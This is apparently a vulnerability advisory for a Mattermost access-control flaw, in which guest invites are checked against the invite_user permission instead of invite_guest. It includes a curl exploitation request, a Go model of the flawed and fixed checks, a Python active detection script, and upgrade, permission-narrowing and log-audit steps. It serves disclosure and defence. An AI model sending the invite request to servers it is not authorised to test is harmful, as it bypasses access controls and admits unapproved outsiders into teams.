Mattermost, Improper Access Control, CVE-2025-XXXXX (Moderate)


In the affected versions Mattermost authorises guest invites with the wrong permission. When the server handles `POST /api/v4/teams/{team_id}/invites/email` it checks only that the caller holds `invite_user`; it never checks `invite_guest`, the permission that is supposed to gate guest accounts. Any authenticated user whose role carries `invite_user` can therefore submit a guest's e-mail address to that endpoint and have a guest account invited into the team, bypassing the restriction that `invite_guest` is meant to enforce.

DailyCVE Form

Platform: Mattermost
Version: 10.6.1, 10.5.2, 10.4.4, 9.11.11
Vulnerability: Improper Access Control
Severity: Moderate
Date: May 17, 2025

What Undercode Says:

Exploitation:

1. The attacker authenticates as an ordinary team member whose role carries `invite_user` but not `invite_guest`, and obtains a session token.

2. The attacker sends the guest's address to the team invite endpoint (placeholders in angle brackets):

curl -X POST \
  -H "Authorization: Bearer <TOKEN>" \
  -H "Content-Type: application/json" \
  -d '{"emails":["<GUEST_EMAIL>"], "team_id":"<TEAM_ID>"}' \
  https://<MATTERMOST_HOST>/api/v4/teams/<TEAM_ID>/invites/email

3. The server checks only `invite_user`, so the invite is accepted and the guest is added to the team even though the caller lacks `invite_guest`. A patched server rejects the same request with 403.

Mitigation:

1. Upgrade to a patched release: 10.6.2, 10.5.3, 10.4.5 or 9.11.12.

2. Until then, narrow who can reach the vulnerable path. Because the flawed check tests `invite_user`, removing `invite_guest` from a role changes nothing; instead remove `invite_user` from non-admin roles in System Console > User Management > Permissions, or disable guest accounts entirely under System Console > Authentication > Guest Access. Mattermost keeps roles in the `Roles` table, with the grants as a space-separated list in the `Permissions` column; use the console to change them and the database only to verify which roles still hold the permission:

SELECT Name, Permissions FROM Roles WHERE Permissions LIKE '%invite_user%';

3. Audit for abuse. The standard Mattermost log does not record every API request, so search the reverse proxy's access log for hits on the invite endpoint (the nginx path below is an assumed location) and then review any guest accounts created during the exposure window:

grep 'invites/email' /var/log/nginx/access.log
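The two checks side by side, as an added example that is not Mattermost's code: a constructed role table in the shape of the `Roles.Permissions` column (space-separated permission names), the flawed authorisation that gates guest invites on `invite_user` alone (the bug described at the top of the page), the corrected check that requires `invite_guest`, and an `exposedRoles` helper that answers the scoping question behind the workaround above: which roles hold `invite_user` without `invite_guest` and could therefore abuse an unpatched server. Role names, their grants and the function names are assumptions for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"sort"
	"strings"
)

// Constructed role table for this example. It mirrors the shape of Mattermost's
// Roles.Permissions column (a space-separated list of permission names), but the
// rows are made up for illustration, not dumped from a real server.
var roles = map[string]string{
	"system_admin": "invite_user invite_guest manage_team",
	"team_admin":   "invite_user invite_guest manage_team",
	"team_user":    "invite_user create_post",
	"team_guest":   "create_post",
}

// hasPermission reports whether the role grants the named permission.
func hasPermission(role, perm string) bool {
	for _, p := range strings.Fields(roles[role]) {
		if p == perm {
			return true
		}
	}
	return false
}

var errForbidden = errors.New("403: caller lacks the required permission")

// inviteGuestVulnerable models the flawed server-side check: the guest-invite
// request is authorised with invite_user only, so any ordinary team member
// who may invite regular users may also invite guests.
func inviteGuestVulnerable(role, email string) (string, error) {
	if !hasPermission(role, "invite_user") {
		return "", errForbidden
	}
	return fmt.Sprintf("guest invite sent to %s", email), nil
}

// inviteGuestFixed requires the permission that actually governs guest invites.
func inviteGuestFixed(role, email string) (string, error) {
	if !hasPermission(role, "invite_guest") {
		return "", errForbidden
	}
	return fmt.Sprintf("guest invite sent to %s", email), nil
}

// exposedRoles lists the roles that can reach the vulnerable path: they hold
// invite_user but not invite_guest, so on an unpatched server they can create
// guest accounts they were never meant to create. Sorted for stable output.
func exposedRoles() []string {
	var out []string
	for r := range roles {
		if hasPermission(r, "invite_user") && !hasPermission(r, "invite_guest") {
			out = append(out, r)
		}
	}
	sort.Strings(out)
	return out
}

func main() {
	const email = "guest@example.invalid" // placeholder address
	for _, role := range []string{"team_user", "team_admin", "team_guest"} {
		_, vErr := inviteGuestVulnerable(role, email)
		_, fErr := inviteGuestFixed(role, email)
		fmt.Printf("%-11s accepted by vulnerable check=%v, by fixed check=%v\n",
			role, vErr == nil, fErr == nil)
	}
	fmt.Println("roles exposed on an unpatched server:", exposedRoles())
}
```

Running it shows `team_user` accepted by the vulnerable check and rejected by the fixed one, while the admin roles pass both; `exposedRoles` returns exactly the roles the workaround in step 2 needs to strip `invite_user` from.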

Detection:

import requests

def check_vuln(host, token, team_id, guest_email):
    """Active check: authenticate as a user holding invite_user but NOT invite_guest
    and try to invite a throwaway guest address into a test team. A 2xx reply means
    the server accepted the request (vulnerable); a patched server answers 403.
    Note: on a vulnerable server this sends a real invite, so use a scratch team."""
    r = requests.post(f"{host}/api/v4/teams/{team_id}/invites/email",
                      headers={"Authorization": f"Bearer {token}"},
                      json={"emails": [guest_email]}, timeout=10)
    return r.ok  # True -> vulnerable, False (403) -> patched

Patch Analysis:

The fix adds an explicit `invite_guest` check on the guest-invite path in `api4/team.go`. The snippet below is an illustrative form of that check, not the verbatim upstream diff (the slice type is `[]*model.Permission`, which is what `MakePermissionError` expects):

if !a.HasPermissionToTeam(userId, teamId, model.PermissionInviteGuest) {
    return nil, a.MakePermissionError(session, []*model.Permission{model.PermissionInviteGuest})
}

Impact: Any team member who can invite regular users can also bring guest accounts into the team, so the admin-controlled boundary between internal and external users is no longer enforced and team content can be exposed to people who were never approved as guests.

References:

  • GitHub Advisory: GHSA-xxxx-xxxx-xxxx
  • NVD: CVE-2025-XXXXX

Sources:

Reported By: github.com
Extra Source Hub:
Undercode
